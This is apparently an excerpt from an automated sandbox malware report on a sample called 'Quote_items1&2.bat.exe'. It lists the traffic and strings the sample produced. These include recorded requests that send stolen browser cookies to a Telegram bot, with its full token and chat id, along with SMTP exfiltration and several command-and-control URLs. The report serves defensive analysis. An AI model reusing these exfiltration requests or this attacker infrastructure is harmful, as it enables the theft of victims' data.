                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: POST /bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendDocument?chat_id=6851554211&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd502839ff0e82Host: api.telegram.orgContent-Length: 1281
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:25%0D%0ACountry%20Name:%20United%20States%0D%0A[%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendDocument?chat_id=6851554211&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50284136df60Host: api.telegram.orgContent-Length: 1281
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 78.135.65.4 78.135.65.4
                Source: Joe Sandbox ViewASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49791 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49880 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49853 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49834 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49843 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49896 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49911 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49874 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49863 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49925 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49944 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49951 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:64736 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49902 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:64742 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:64752 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49939 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:64729 -> 104.21.16.1:443
                Source: global trafficTCP traffic: 192.168.2.6:64730 -> 78.135.65.4:587
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49815 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49909 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:25%0D%0ACountry%20Name:%20United%20States%0D%0A[%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: mail.bteenerji.com
                Source: unknownHTTP traffic detected: POST /bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendDocument?chat_id=6851554211&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd502839ff0e82Host: api.telegram.orgContent-Length: 1281
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 19:26:17 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 19:26:28 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000340E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000340E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bteenerji.com
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000340E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000345D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.bteenerji.com
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000C.00000002.2459417256.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4014178087.000000001CEA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.000000001324B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000342E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000347D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000342E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000347D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20a
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000347D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendDocument?chat_id=6851
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.000000001324B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.000000001324B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.000000001324B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000339E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.0000000003245000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003295000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
